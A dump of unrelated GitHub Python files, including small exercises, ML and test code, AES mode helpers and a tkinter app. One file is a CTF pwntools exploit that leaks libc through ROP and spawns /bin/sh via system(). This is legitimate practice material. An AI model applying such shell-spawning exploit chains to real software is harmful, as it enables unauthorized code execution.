github-code
|
6
|
35509709603
|
def sum_even_odd_digits(number):
ch = 0
nch = 0
position = 1
while number > 0:
digit = number % 10
if position % 2 == 0:
ch += digit
else:
nch += digit
number //= 10
position += 1
return ch, nch
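# Worked example (illustrative): for number = 1234 the digits are scanned right to left,
# so nch (odd positions) = 4 + 2 = 6 and ch (even positions) = 3 + 1 = 4;
# result = 6 + 4*3 = 18, and 18 % 10 != 0, so the program prints "no".
# For number = 406: nch = 6 + 4 = 10, ch = 0, result = 10, so it prints "yes".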
number = int(input())
ch, nch = sum_even_odd_digits(number)
result=nch+ch*3
if (result%10==0):
print("yes")
else:
print("no")
|
aas1565/Python
|
buns/mod2_1/task13_new.py
|
task13_new.py
|
py
| 417 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2872283986
|
import requests
import datetime as dt
from twilio.rest import Client
account_sid = 'Twilio_api_sid'
auth_token = 'twilio_auth_token'
STOCK = "TSLA"
COMPANY_NAME = "Tesla Inc"
stock_api_key = 'alpha_vantage_api_key'
news_api_key = 'news_api_key'
STOCK_ENDPOINT = "https://www.alphavantage.co/query"
NEWS_ENDPOINT = "https://newsapi.org/v2/everything"
today = dt.datetime.now().date()
lag_1day = str(today - dt.timedelta(days=1))
lag_2day = str(today - dt.timedelta(days=2))
up_down = ''
percent_change = 0
stock_parameters = {
'function': 'TIME_SERIES_DAILY_ADJUSTED',
'symbol': STOCK,
'outputsize': 'compact',
'apikey': stock_api_key,
'pageSize': 3,
'page': 1,
}
news_parameters = {
'q': COMPANY_NAME,
'from': lag_2day,
'to': lag_1day,
'sortBy': 'publishedAt',
'apiKey': news_api_key,
}
# Make api request to stock api
stock_response = requests.get(STOCK_ENDPOINT, params=stock_parameters)
stock_response.raise_for_status()
stock_data = stock_response.json()
# Get closing price
try:
lag_1day_close = float(stock_data['Time Series (Daily)'][lag_1day]['4. close'])
except KeyError:
lag_1day_close = None
try:
lag_2day_close = float(stock_data['Time Series (Daily)'][lag_2day]['4. close'])
except KeyError:
lag_2day_close = None
# Find percent change, and set up_down symbol
if lag_1day_close is not None and lag_2day_close is not None:
difference = lag_1day_close - lag_2day_close
percent_change = round((difference / lag_1day_close) * 100)
if difference < 0:
up_down = '🔻'
else:
up_down = '🔺'
# Make api request to get news articles
news_response = requests.get(NEWS_ENDPOINT, params=news_parameters)
news_response.raise_for_status()
news_data = news_response.json()
top_news = news_data['articles'][:3]
news_title_list = [top_news[_]['title'] for _ in range(len(top_news))]
news_description_list = [top_news[_]['description'] for _ in range(len(top_news))]
# Send text messages
if percent_change >= 5 or percent_change <= -5:
for i in range(len(news_title_list)):
client = Client(account_sid, auth_token)
message = client.messages \
.create(
body=f'{STOCK}: {up_down}{percent_change}%\nHeadline: {news_title_list[i]}\nBrief: {news_description_list[i]}',
from_='+19257226085',
to='+15551234567'
)
|
mgardner1011/UdemyProjects
|
Stock_news_alert/main.py
|
main.py
|
py
| 2,383 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42896269372
|
import jax
import numpy as np
import numpy.testing as npt
import pytest
from matplotlib import pyplot as plt
from statsmodels.graphics.tsaplots import plot_acf
from .common import GaussianDistribution, FlatPotential, FlatUnivariatePotential, GaussianDynamics, lgssm_data, \
GaussianObservationPotential
from ..csmc import get_kernel
@pytest.fixture(scope="module", autouse=True)
def jax_config():
jax.config.update("jax_platform_name", "cpu")
@pytest.mark.parametrize("backward", [True, False])
def test_flat_potential(backward):
# Test a flat potential, to check that we recover the prior.
# The model is a stationary AR process with Gaussian noise.
JAX_KEY = jax.random.PRNGKey(0)
T = 5 # T time steps
RHO = 0.9 # correlation
N = 32 # use N particles in total
M = 50_000 # get M - B samples from the particle Gibbs kernel
B = M // 10 # Discard the first 10% of the samples
M0 = GaussianDistribution(mu=0.0, sig=1.0)
G0 = FlatUnivariatePotential()
Gt = FlatPotential()
Mt = GaussianDynamics(rho=RHO)
init, kernel = get_kernel(M0, G0, Mt, Gt, N=N, backward=backward, Pt=Mt)
init_key, key = jax.random.split(JAX_KEY)
x0 = jax.random.normal(init_key, (T, 1))
init_state = init(x0)
def body(state, curr_key):
state = kernel(curr_key, state)
return state, (state.x, state.updated)
_, (xs, ancestors) = jax.lax.scan(body, init_state, jax.random.split(key, M))
xs = xs[B:, :, 0]
fig, axes = plt.subplots(ncols=2, figsize=(10, 5))
fig.suptitle("Backward: {}".format(backward))
plot_acf(xs[:, 0], ax=axes[0])
axes[0].set_title("ACF of x_0")
plot_acf(xs[:, T // 2], ax=axes[1])
axes[1].set_title("ACF of x_T/2")
plt.show()
atol = 0.05
cov = np.cov(xs, rowvar=False)
cov = np.atleast_2d(cov)
rows, cols = np.diag_indices_from(cov)
cov_diag = cov[rows, cols] # marginal variances
sub_cov_diag = cov[rows[:-1], cols[1:]] # Covariances between adjacent time steps
npt.assert_allclose(xs.mean(axis=0), 0., atol=atol)
npt.assert_allclose(cov_diag, 1., atol=atol)
npt.assert_allclose(sub_cov_diag, RHO, atol=atol)
@pytest.mark.parametrize("backward", [True, False])
def test_lgssm(backward):
# Test a LGSSM model test
JAX_KEY = jax.random.PRNGKey(0)
T = 25 # T time steps
RHO = 0.9 # correlation
SIG_Y = 0.1 # observation noise
data_key, init_key, key = jax.random.split(JAX_KEY, 3)
true_xs, true_ys = lgssm_data(data_key, RHO, SIG_Y, T)
N = 32 # use N particles in total
M = 50_000 # get M - B samples from the particle Gibbs kernel
B = M // 10 # Discard the first 10% of the samples
M0 = GaussianDistribution(mu=0.0, sig=1.0)
G0 = GaussianDistribution(mu=true_ys[0], sig=SIG_Y)
Gt = GaussianObservationPotential(params=true_ys[1:], sig=SIG_Y)
Mt = GaussianDynamics(rho=RHO)
init, kernel = get_kernel(M0, G0, Mt, Gt, N=N, backward=backward, Pt=Mt)
x0 = jax.random.normal(init_key, (T, 1))
init_state = init(x0)
def body(state, curr_key):
state = kernel(curr_key, state)
return state, (state.x, state.updated)
_, (xs, ancestors) = jax.lax.scan(body, init_state, jax.random.split(key, M))
xs = xs[B:, :, 0]
fig, axes = plt.subplots(ncols=3, figsize=(15, 5))
fig.suptitle("Backward: {}".format(backward))
plot_acf(xs[:, 0], ax=axes[0])
axes[0].set_title("ACF of x_0")
plot_acf(xs[:, T // 2], ax=axes[1])
axes[1].set_title("ACF of x_T/2")
plot_acf(xs[:, -1], ax=axes[2])
axes[2].set_title("ACF of x_T")
plt.show()
print(xs.mean(axis=0))
print(xs.std(axis=0))
|
AdrienCorenflos/aux-ssm-samplers
|
aux_samplers/_primitives/test_csmc/test_csmc.py
|
test_csmc.py
|
py
| 3,688 |
python
|
en
|
code
| 7 |
github-code
|
6
|
25467673406
|
import tkinter as tk
import message
class Scribble:
def on_pressed(self, event):
self.sx = event.x
self.sy = event.y
self.canvas.create_oval(self.sx, self.sy, event.x, event.y,
outline = self.color.get(),
width = self.width.get())
def on_dragged(self, event):
self.canvas.create_line(self.sx, self.sy, event.x, event.y,
fill = self.color.get(),
width = self.width.get())
self.sx = event.x
self.sy = event.y
def create_window(self):
window = tk.Tk()
window.title('Painterz')
self.canvas = tk.Canvas(window, bg = "white", width = 600, height = 300)
self.canvas.pack()
menu = tk.Menu(window)
window.config(menu=menu)
filemenu = tk.Menu(menu)
menu.add_cascade(label="File", menu=filemenu)
filemenu.add_command(label="New", command=message.callback)
filemenu.add_command(label="Open...", command=message.callback)
filemenu.add_separator()
filemenu.add_command(label="Exit", command=message.callback)
helpmenu = tk.Menu(menu)
menu.add_cascade(label="Help", menu=helpmenu)
helpmenu.add_command(label="About...", command=message.callback)
        quit_button = tk.Button(window, text = "Quit", command = window.quit)
quit_button.pack(side = tk.RIGHT)
self.canvas.bind("<ButtonPress-1>", self.on_pressed)
self.canvas.bind("<B1-Motion>", self.on_dragged)
COLORS = ["red", "green", "blue", "#FF00FF", "black"]
self.color = tk.StringVar()
self.color.set(COLORS[1])
b = tk.OptionMenu(window, self.color, *COLORS)
b.pack(side = tk.LEFT)
self.width = tk.Scale(window, from_ = 1, to = 15, orient = tk.HORIZONTAL)
self.width.set(5)
self.width.pack(side = tk.LEFT)
        return window
    def __init__(self):
        self.window = self.create_window()
def run(self):
self.window.mainloop()
Scribble().run()
|
watachan7/Python_tkinter_painterz
|
src/Painter.py
|
Painter.py
|
py
| 2,232 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27061966352
|
__all__ = [
"InvalidPaddingError",
"find_potential_ecb",
"pad_pkcs_7",
"strip_pkcs_7",
"detect_potential_repeating_ecb_blocks",
"ecb_encrypt",
"cbc_encrypt_prepadded",
"ecb_decrypt",
"cbc_encrypt",
"cbc_decrypt",
"ctr_transcrypt"
]
# noinspection PyPackageRequirements
# false alert, is in requirements as pycryptodome
from Crypto.Cipher import AES
from bitfiddle import brake_into_keysize_blocks
from primitive_crypt import xor_buffers
def detect_potential_repeating_ecb_blocks(ciphertext, blocksize=16):
seen = set()
for block in brake_into_keysize_blocks(ciphertext, blocksize):
if block in seen:
return True
else:
seen.add(block)
return False
def find_potential_ecb(cyphertexts):
for cyphertext in cyphertexts:
if detect_potential_repeating_ecb_blocks(cyphertext):
return cyphertext
return None
def pad_pkcs_7(blob, blocksize):
num_pad_bytes = blocksize - (len(blob) % blocksize)
padding = bytes([num_pad_bytes] * num_pad_bytes)
return blob + padding
class InvalidPaddingError(ValueError):
pass
def strip_pkcs_7(blob):
length = len(blob)
if length == 0:
raise InvalidPaddingError()
num_padding = blob[-1]
if num_padding == 0 or length < num_padding:
raise InvalidPaddingError()
for byte in blob[-num_padding:]:
if byte != num_padding:
raise InvalidPaddingError()
return blob[:-num_padding]
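# Worked example (illustrative): pad_pkcs_7(b"ICE ICE BABY", 16)
# returns b"ICE ICE BABY\x04\x04\x04\x04" (12 data bytes + 4 padding bytes of value 0x04),
# and strip_pkcs_7 reverses it; malformed padding such as b"ICE ICE BABY\x01\x02\x03\x04"
# makes strip_pkcs_7 raise InvalidPaddingError.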
def ecb_encrypt(key, plaintext):
cipher = AES.new(key, AES.MODE_ECB)
input_blob = pad_pkcs_7(plaintext, 16)
return cipher.encrypt(input_blob)
def ecb_decrypt(key, ciphertext):
cipher = AES.new(key, AES.MODE_ECB)
decrypted = cipher.decrypt(ciphertext)
return strip_pkcs_7(decrypted)
def cbc_encrypt_prepadded(key, iv, plaintext):
blocks = brake_into_keysize_blocks(plaintext, 16)
cipher = AES.new(key, AES.MODE_ECB)
def cryptoblocks():
last_block = iv
for block in blocks:
chained = xor_buffers(last_block, block)
last_block = cipher.encrypt(chained)
yield last_block
return b''.join([cb for cb in cryptoblocks()])
def cbc_encrypt(key, iv, plaintext):
return cbc_encrypt_prepadded(key, iv, pad_pkcs_7(plaintext, 16))
def cbc_decrypt(key, iv, ciphertext):
assert len(ciphertext) % 16 == 0
blocks = brake_into_keysize_blocks(ciphertext, 16)
cipher = AES.new(key, AES.MODE_ECB)
def plainblocks():
last_block = iv
for block in blocks:
decrypted_block = cipher.decrypt(block)
plain_block = xor_buffers(last_block, decrypted_block)
last_block = block
yield plain_block
return strip_pkcs_7(b''.join(pb for pb in plainblocks()))
def ctr_keystream(key, nonce, block_count):
if nonce < 0 or nonce > 2**64 or block_count < 0 or block_count > 2**64:
raise ValueError()
plain_nonce = nonce.to_bytes(8, byteorder="little", signed=False)
plain_count = block_count.to_bytes(8, byteorder="little", signed=False)
plain = plain_nonce + plain_count
cipher = AES.new(key, AES.MODE_ECB)
return cipher.encrypt(plain)
def ctr_transcrypt(key, nonce, data):
instream = brake_into_keysize_blocks(data, 16)
num_blocks = len(instream)
if num_blocks == 0:
return b''
keystream = [ctr_keystream(key, nonce, i) for i in range(num_blocks)]
keystream[-1] = keystream[-1][:len(instream[-1])]
outstream = [xor_buffers(instream[i], keystream[i])
for i in range(num_blocks)]
return b''.join(outstream)
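# Minimal self-check sketch (illustrative only; the key, IV and nonce values are arbitrary):
if __name__ == "__main__":
    demo_key = bytes(range(16))      # any 16-byte AES key
    demo_iv = bytes(16)              # all-zero IV, acceptable for a demo only
    ct = cbc_encrypt(demo_key, demo_iv, b"attack at dawn")
    assert cbc_decrypt(demo_key, demo_iv, ct) == b"attack at dawn"
    # CTR mode is an XOR stream, so transcrypting the ciphertext again recovers the plaintext
    assert ctr_transcrypt(demo_key, 0, ctr_transcrypt(demo_key, 0, b"attack at dawn")) == b"attack at dawn"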
|
BrendanCoughlan/cryptopals
|
block_crypt.py
|
block_crypt.py
|
py
| 3,652 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42965233010
|
# *args = parameter that will pack all arguments into a tuple. Useful for the function to be more flexible thing varying amount of arguments.
# def add(num1, num2):
# sum = num1 + num2
# return sum
# print(add(1,2,3)) #no longer can use this if the parameter is more than 2
def add(*stuff):
sum = 0
stuff = list(stuff)
stuff[0] = 0
for i in stuff:
sum += i
return sum
print(add(1,2,3,4,5,6,7,8,9))
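# Illustrative: the same packing works in reverse at the call site with the * operator;
# add(*[4, 5, 6]) passes 4, 5 and 6 as separate arguments and returns 11 here,
# because the function zeroes out the first packed value before summing.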
|
Naqiu00/Python-beginner
|
args_parameter.py
|
args_parameter.py
|
py
| 437 |
python
|
en
|
code
| 0 |
github-code
|
6
|
33232976991
|
def find_empty_space(puzzle):
# find an empty space and return -1 if it exists
# this function will return row, col tuple
for i in range(9):
for j in range(9):
if puzzle[i][j] == -1:
return i, j
# if there's no empty space
return None, None
def guess_is_valid(puzzle, guess, row, col):
# this function will return True if guess is valid, else False
row_values = puzzle[row]
if guess in row_values:
return False
# row index will vary but col index will remain same within each row
col_values = []
for x in range(9):
col_values.append(puzzle[x][col])
if guess in col_values:
return False
# to get the start of our 3x3 matrix
row_start = (row // 3) * 3
col_start = (col // 3) * 3
# iterate through the 3 values
for a in range(row_start, row_start + 3):
for b in range(col_start, col_start + 3):
if puzzle[a][b] == guess:
return False
return True
def sudoku_solver(puzzle):
# input is a list of lists
# returns whether a solution exists or not
# choosing an entry point or blank space
row, col = find_empty_space(puzzle)
# edge case - check for either row or col is None (no empty space)
if row is None:
return True
for guess in range(1, 10):
if guess_is_valid(puzzle, guess, row, col):
# if guess is valid, place it on the puzzle
puzzle[row][col] = guess
# recursive call
if sudoku_solver(puzzle):
return True
# if guess is incorrect, then backtrack and try again
# reset the guess to empty space i.e. -1
puzzle[row][col] = -1
# if no guess is correct, then provided puzzle can't be solved and return False
return False
if __name__ == '__main__':
sample_puzzle = [
[3, 9, -1, -1, 5, -1, -1, -1, -1],
[-1, -1, -1, 2, -1, -1, -1, -1, 5],
[-1, -1, -1, 7, 1, 9, -1, 8, -1],
[-1, 5, -1, -1, 6, 8, -1, -1, -1],
[2, -1, 6, -1, -1, 3, -1, -1, -1],
[-1, -1, -1, -1, -1, -1, -1, -1, 4],
[5, -1, -1, -1, -1, -1, -1, -1, -1],
[6, 7, -1, 1, -1, 5, -1, 4, -1],
[1, -1, 9, -1, -1, -1, 2, -1, -1]
]
print(sudoku_solver(sample_puzzle))
print(sample_puzzle)
|
Nikhil-Pachpande/sudoku-solver
|
sudoku.py
|
sudoku.py
|
py
| 2,505 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21845001985
|
math = int(input("Enter math rate: "))
physics = int(input("Enter physics rate: "))
geography = int(input("Enter geography rate: "))
history = int(input("Enter history rate: "))
geometry = int(input("Enter geometry rate: "))
result = math + physics + geography + history + geometry
if result <= 40:
print("Fail")
elif result >= 41 and result <= 60:
    print("Satisfactory")
elif result >= 61 and result <= 80:
    print("Good")
elif result >= 81 and result <= 100:
    print("Outstanding")
else:
print("Something went wrong with this input")
|
Areg14/DroneEduLab
|
Lesson5/Problem2.py
|
Problem2.py
|
py
| 550 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70063592188
|
from pwn import *
from LibcSearcher import *
# p=remote('61.147.171.105',51339)
p=process('./whoami')
elf=ELF('./whoami')
#libc=ELF('./libc-2.27.so')
# libc=ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')
libc=ELF('/home/cutecabbage/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6')
rl = lambda a=False : p.recvline(a)
ru = lambda a=True : p.recvuntil(a)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))
#rdi, rsi, rdx, rcx,
bss_addr=0x601040
buf_addr1=bss_addr+0xc0
buf_addr2=bss_addr+0x70
buf_addr3=bss_addr+0x308
main_addr=0x0000000000400771
pop_rbp=0x0000000000400648
pop_rdi=0x0000000000400843
pop_rsi_r15=0x0000000000400841
puts_plt=elf.plt['puts']
read_plt=elf.plt['read']
puts_got=elf.got['puts']
read_got=elf.got['read']
read_0x70=0x00000000004007BB
leave_ret=0x00000000004007d6
power_rop1=0x000000000040083A
power_rop2=0x0000000000400820
def getpower(avg1,avg2,avg3,plt):
payload=p64(power_rop1)+p64(0)+p64(0)+p64(1)+p64(plt)+p64(avg1)+p64(avg2)+p64(avg3)
payload+=p64(power_rop2)+p64(0)*7
return payload
ru(b'Input name:\n')
payload1=b'a'*0x20+p64(buf_addr1)+p64(leave_ret)
file_path = 'payload1'
with open(file_path, 'wb') as file_obj:
file_obj.write(payload1)
sn(payload1)
ru(b'Else?\n')
payload2=b'b'*0xc0+p64(buf_addr2)
payload2+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(read_0x70)
# payload2=payload2.ljust(240,b'\x00')
file_path = 'payload2'
with open(file_path, 'wb') as file_obj:
file_obj.write(payload2)
sn(payload2)
puts_addr=u64(p.recv().strip().ljust(8,b'\x00'))
print(hex(puts_addr))
# libc=LibcSearcher('read',read_addr)
# print(libc.dump('system'))
# libc=LibcSearcher('read',read_addr)
# libcbase=read_addr-libc.dump('read')
libcbase=puts_addr-libc.symbols['puts']
print('libcbase',hex(libcbase))
# system_addr=libcbase+libc.dump('system')
system_addr=libcbase+libc.symbols['system']
print("system:",hex(system_addr))
pause()
payload3=b'w'*0x70+p64(buf_addr3)
payload3+=p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(buf_addr3)+p64(0)+p64(read_plt)+p64(leave_ret)
# payload3=payload3.ljust(240,b's')
file_path = 'payload3'
with open(file_path, 'wb') as file_obj:
file_obj.write(payload3)
# print(payload3)
sn(payload3)
payload4 = p64(bss_addr+0x400)
payload4 += p64(pop_rdi)
payload4 += p64(bss_addr+0x308+0x20)
payload4 += p64(system_addr)
payload4 += b'/bin/sh\x00'
file_path = 'payload4'
with open(file_path, 'wb') as file_obj:
file_obj.write(payload4)
sl(payload4)
# payload2=b'a'*0x70+p64(buf_addr2)
# payload2+=p64(pop_rdi)+p64(read_got)+p64(puts_plt)+p64(read_0x70)
# sn(payload2)
# print(p.recv())
pause()
p.interactive()
|
CookedMelon/mypwn
|
adworld/whoami/exp-bak.py
|
exp-bak.py
|
py
| 2,967 |
python
|
en
|
code
| 3 |
github-code
|
6
|
10423288883
|
from __future__ import annotations
import pytest
from PySide6.QtCore import Qt
from randovania.game_description.db.configurable_node import ConfigurableNode
from randovania.game_description.db.dock_node import DockNode
from randovania.game_description.db.event_node import EventNode
from randovania.game_description.db.hint_node import HintNode
from randovania.game_description.db.node import GenericNode
from randovania.game_description.db.pickup_node import PickupNode
from randovania.game_description.db.teleporter_network_node import TeleporterNetworkNode
from randovania.gui.dialog.node_details_popup import NodeDetailsPopup
@pytest.mark.parametrize(
"node_type",
[
GenericNode,
DockNode,
PickupNode,
EventNode,
ConfigurableNode,
HintNode,
],
)
def test_unchanged_create_new_node_echoes(skip_qtbot, echoes_game_description, node_type):
node = next(node for node in echoes_game_description.region_list.iterate_nodes() if isinstance(node, node_type))
dialog = NodeDetailsPopup(echoes_game_description, node)
skip_qtbot.addWidget(dialog)
# Run
new_node = dialog.create_new_node()
# Assert
assert node == new_node
@pytest.mark.parametrize(
"node_type",
[
TeleporterNetworkNode,
],
)
def test_unchanged_create_new_node_corruption(skip_qtbot, corruption_game_description, node_type):
node = next(node for node in corruption_game_description.region_list.iterate_nodes() if isinstance(node, node_type))
dialog = NodeDetailsPopup(corruption_game_description, node)
skip_qtbot.addWidget(dialog)
# Run
new_node = dialog.create_new_node()
# Assert
assert node == new_node
def test_change_incompatible_dock_list(skip_qtbot, echoes_game_description):
node = next(node for node in echoes_game_description.region_list.iterate_nodes() if isinstance(node, DockNode))
dialog = NodeDetailsPopup(echoes_game_description, node)
skip_qtbot.addWidget(dialog)
model = dialog.dock_incompatible_model
m = model.index(0)
assert model.data(m, Qt.ItemDataRole.WhatsThisRole) is None
assert model.data(m, Qt.ItemDataRole.DisplayRole) == "New..."
assert model.data(m, Qt.ItemDataRole.EditRole) == ""
assert not model.setData(m, "Normal Door", Qt.ItemDataRole.DisplayRole)
assert model.data(m, Qt.ItemDataRole.DisplayRole) == "New..."
assert model.setData(m, "Normal Door", Qt.ItemDataRole.EditRole)
assert model.data(m, Qt.ItemDataRole.DisplayRole) == "Normal Door"
result = dialog.create_new_node()
assert isinstance(result, DockNode)
assert [w.name for w in result.incompatible_dock_weaknesses] == ["Normal Door"]
assert model.removeRow(0, m)
assert model.data(m, Qt.ItemDataRole.EditRole) == ""
result = dialog.create_new_node()
assert isinstance(result, DockNode)
assert [w.name for w in result.incompatible_dock_weaknesses] == []
def test_on_pickup_index_button_generic(skip_qtbot, echoes_game_description):
node = next(node for node in echoes_game_description.region_list.iterate_nodes() if isinstance(node, GenericNode))
dialog = NodeDetailsPopup(echoes_game_description, node)
skip_qtbot.addWidget(dialog)
dialog.on_pickup_index_button()
assert dialog.pickup_index_spin.value() == 119
def test_on_pickup_index_button_pickup(skip_qtbot, echoes_game_description):
node = next(node for node in echoes_game_description.region_list.iterate_nodes() if isinstance(node, PickupNode))
dialog = NodeDetailsPopup(echoes_game_description, node)
skip_qtbot.addWidget(dialog)
dialog.on_pickup_index_button()
assert dialog.pickup_index_spin.value() == node.pickup_index.index
def test_on_dock_update_name_button(skip_qtbot, blank_game_description):
node = next(node for node in blank_game_description.region_list.iterate_nodes() if isinstance(node, DockNode))
dialog = NodeDetailsPopup(blank_game_description, node)
skip_qtbot.addWidget(dialog)
dialog.name_edit.setText("Weird Name")
# Run
assert dialog.name_edit.text() == "Weird Name"
dialog.on_dock_update_name_button()
assert dialog.name_edit.text() == node.name
|
randovania/randovania
|
test/gui/dialog/test_node_details_popup.py
|
test_node_details_popup.py
|
py
| 4,199 |
python
|
en
|
code
| 165 |
github-code
|
6
|
23935769471
|
import numpy as np
import scipy.sparse as sp
import tensorflow as tf
import gc
import random
from clac_metric import cv_model_evaluate
from utils import *
from model import GCNModel
from opt import Optimizer
def PredictScore(train_drug_dis_matrix, drug_matrix, dis_matrix, seed, epochs, emb_dim, dp, lr, adjdp):
np.random.seed(seed)
tf.reset_default_graph()
tf.set_random_seed(seed)
adj = constructHNet(train_drug_dis_matrix, drug_matrix, dis_matrix)
adj = sp.csr_matrix(adj)
association_nam = train_drug_dis_matrix.sum()
X = constructNet(train_drug_dis_matrix)
features = sparse_to_tuple(sp.csr_matrix(X))
num_features = features[2][1]
features_nonzero = features[1].shape[0]
adj_orig = train_drug_dis_matrix.copy()
adj_orig = sparse_to_tuple(sp.csr_matrix(adj_orig))
adj_norm = preprocess_graph(adj)
adj_nonzero = adj_norm[1].shape[0]
placeholders = {
'features': tf.sparse_placeholder(tf.float32),
'adj': tf.sparse_placeholder(tf.float32),
'adj_orig': tf.sparse_placeholder(tf.float32),
'dropout': tf.placeholder_with_default(0., shape=()),
'adjdp': tf.placeholder_with_default(0., shape=())
}
model = GCNModel(placeholders, num_features, emb_dim,
features_nonzero, adj_nonzero, train_drug_dis_matrix.shape[0], name='LAGCN')
with tf.name_scope('optimizer'):
opt = Optimizer(
preds=model.reconstructions,
labels=tf.reshape(tf.sparse_tensor_to_dense(
placeholders['adj_orig'], validate_indices=False), [-1]),
model=model,
lr=lr, num_u=train_drug_dis_matrix.shape[0], num_v=train_drug_dis_matrix.shape[1], association_nam=association_nam)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
for epoch in range(epochs):
feed_dict = dict()
feed_dict.update({placeholders['features']: features})
feed_dict.update({placeholders['adj']: adj_norm})
feed_dict.update({placeholders['adj_orig']: adj_orig})
feed_dict.update({placeholders['dropout']: dp})
feed_dict.update({placeholders['adjdp']: adjdp})
_, avg_cost = sess.run([opt.opt_op, opt.cost], feed_dict=feed_dict)
if epoch % 100 == 0:
feed_dict.update({placeholders['dropout']: 0})
feed_dict.update({placeholders['adjdp']: 0})
res = sess.run(model.reconstructions, feed_dict=feed_dict)
print("Epoch:", '%04d' % (epoch + 1),
"train_loss=", "{:.5f}".format(avg_cost))
print('Optimization Finished!')
feed_dict.update({placeholders['dropout']: 0})
feed_dict.update({placeholders['adjdp']: 0})
res = sess.run(model.reconstructions, feed_dict=feed_dict)
sess.close()
return res
def cross_validation_experiment(drug_dis_matrix, drug_matrix, dis_matrix, seed, epochs, emb_dim, dp, lr, adjdp):
index_matrix = np.mat(np.where(drug_dis_matrix == 1))
association_nam = index_matrix.shape[1]
random_index = index_matrix.T.tolist()
random.seed(seed)
random.shuffle(random_index)
k_folds = 5
CV_size = int(association_nam / k_folds)
temp = np.array(random_index[:association_nam - association_nam %
k_folds]).reshape(k_folds, CV_size, -1).tolist()
temp[k_folds - 1] = temp[k_folds - 1] + \
random_index[association_nam - association_nam % k_folds:]
random_index = temp
metric = np.zeros((1, 7))
print("seed=%d, evaluating drug-disease...." % (seed))
for k in range(k_folds):
print("------this is %dth cross validation------" % (k+1))
train_matrix = np.matrix(drug_dis_matrix, copy=True)
train_matrix[tuple(np.array(random_index[k]).T)] = 0
drug_len = drug_dis_matrix.shape[0]
dis_len = drug_dis_matrix.shape[1]
drug_disease_res = PredictScore(
train_matrix, drug_matrix, dis_matrix, seed, epochs, emb_dim, dp, lr, adjdp)
predict_y_proba = drug_disease_res.reshape(drug_len, dis_len)
metric_tmp = cv_model_evaluate(
drug_dis_matrix, predict_y_proba, train_matrix)
print(metric_tmp)
metric += metric_tmp
del train_matrix
gc.collect()
print(metric / k_folds)
metric = np.array(metric / k_folds)
return metric
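# Note on the fold masking above (explanatory comment, not part of the original
# script): random_index[k] is a list of [row, col] pairs, so
# np.array(random_index[k]).T yields one row of row indices and one row of
# column indices, and
#     train_matrix[tuple(np.array(random_index[k]).T)] = 0
# zeroes out exactly the k-th fold of known drug-disease associations, which
# are then held out for evaluation.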
if __name__ == "__main__":
drug_sim = np.loadtxt('../data/drug_sim.csv', delimiter=',')
dis_sim = np.loadtxt('../data/dis_sim.csv', delimiter=',')
drug_dis_matrix = np.loadtxt('../data/drug_dis.csv', delimiter=',')
epoch = 4000
emb_dim = 64
lr = 0.01
adjdp = 0.6
dp = 0.4
simw = 6
result = np.zeros((1, 7), float)
average_result = np.zeros((1, 7), float)
circle_time = 1
for i in range(circle_time):
result += cross_validation_experiment(
drug_dis_matrix, drug_sim*simw, dis_sim*simw, i, epoch, emb_dim, dp, lr, adjdp)
average_result = result / circle_time
print(average_result)
|
storyandwine/LAGCN
|
code/main.py
|
main.py
|
py
| 5,019 |
python
|
en
|
code
| 45 |
github-code
|
6
|
72331827389
|
import csv
class Node:
def __init__(self, name):
self.name = name
self.links = []
self.visited = False
class Link:
def __init__(self, fromNode, toNode, cost):
self.cost = cost
self.nodes = [fromNode, toNode]
class Graph:
def __init__(self, fileName):
self.nodes = {}
with open(fileName, 'r', encoding='utf-8') as csvfile:
reader = csv.reader(csvfile, delimiter=' ')
i = 0
for row in reader:
i += 1
if i == 1:
self.V = int(row[0])
elif i == 2:
self.E = int(row[0])
if len(row) == 2:
self.add_edge(int(row[0]), int(row[1]))
def add_edge(self, fromNodeKey, toNodeKey):
if not self.nodes.get(fromNodeKey):
self.nodes[fromNodeKey] = Node(fromNodeKey)
if not self.nodes.get(toNodeKey):
self.nodes[toNodeKey] = Node(toNodeKey)
fromNode = self.nodes[fromNodeKey]
toNode = self.nodes[toNodeKey]
link = Link(fromNode, toNode, 1)
self.nodes[fromNodeKey].links.append(link)
def print(self):
for k, v in self.nodes.items():
print(k, v.links)
if __name__ == '__main__':
foo = Graph("tinyG.txt")
foo.print()
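# Expected layout of "tinyG.txt", inferred from the constructor above (the
# numbers below are only an illustration):
#
#   13        <- number of vertices (first line, row[0])
#   13        <- number of edges (second line, row[0])
#   0 5       <- one space-separated "v w" pair per edge
#   4 3
#   0 1
#   ...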
|
cdfmlr/Graph_Python
|
graph_class.py
|
graph_class.py
|
py
| 1,343 |
python
|
en
|
code
| 1 |
github-code
|
6
|
36010802868
|
# -*- coding: cp1252 -*-
import arcpy
#-------- Update the ID_Support values so that they can be unique
def update_IDSupport(in_table, sqlClause):
fields=("ID_Support")
workspace = 'F:/Douala/Data_gathering/Gathring.gdb'
# Open an edit session and start an edit operation
with arcpy.da.Editor(workspace) as edit:
cursor = arcpy.da.UpdateCursor(in_table, fields, sqlClause)
cpt=1
newVal = ""
for row in cursor:
if len(str(cpt))==1:
newVal = row[0] + "000" + str(cpt)
elif len(str(cpt))==2:
newVal = row[0] + "00" + str(cpt)
elif len(str(cpt))==3:
newVal = row[0] + "0" + str(cpt)
elif len(str(cpt))==4:
newVal = row[0] + str(cpt)
print("Old value = " + str(row[0]))
row[0]=newVal
print("New value = " + newVal)
print("Starting data update ...")
cursor.updateRow(row)
print("Update done ...")
cpt+=1
print("Rows updated = " + str(cpt))
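# Note (not part of the original script): the if/elif padding chain above is
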